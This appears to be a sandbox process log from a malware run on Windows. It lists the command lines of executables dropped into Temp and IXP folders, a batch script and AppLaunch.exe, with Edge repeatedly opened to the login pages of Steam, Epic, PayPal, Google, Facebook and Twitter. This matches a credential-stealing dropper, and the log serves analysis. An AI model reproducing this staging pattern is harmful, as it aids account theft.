"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2852 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2800 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,9359833603542391446,16454255164888473861,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7624 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\1FF.exe
C:\Users\Admin\AppData\Local\Temp\1FF.exe
C:\Users\Admin\AppData\Local\Temp\2AC.exe
C:\Users\Admin\AppData\Local\Temp\2AC.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cD6gf0cw.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sC1QR4ep.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kA2jC6AK.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B6.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\HG0CX5rO.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1XI48lH3.exe
C:\Users\Admin\AppData\Local\Temp\4A2.exe
C:\Users\Admin\AppData\Local\Temp\4A2.exe
C:\Users\Admin\AppData\Local\Temp\58D.exe
C:\Users\Admin\AppData\Local\Temp\58D.exe
C:\Users\Admin\AppData\Local\Temp\6D6.exe
C:\Users\Admin\AppData\Local\Temp\6D6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\958.exe
C:\Users\Admin\AppData\Local\Temp\958.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7500 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yh035IN.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yh035IN.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 6224 -ip 6224
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8180 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 204
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4548 -ip 4548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 784
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,11767824503793983700,16661587439160944723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf56146f8,0x7ffdf5614708,0x7ffdf5614718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
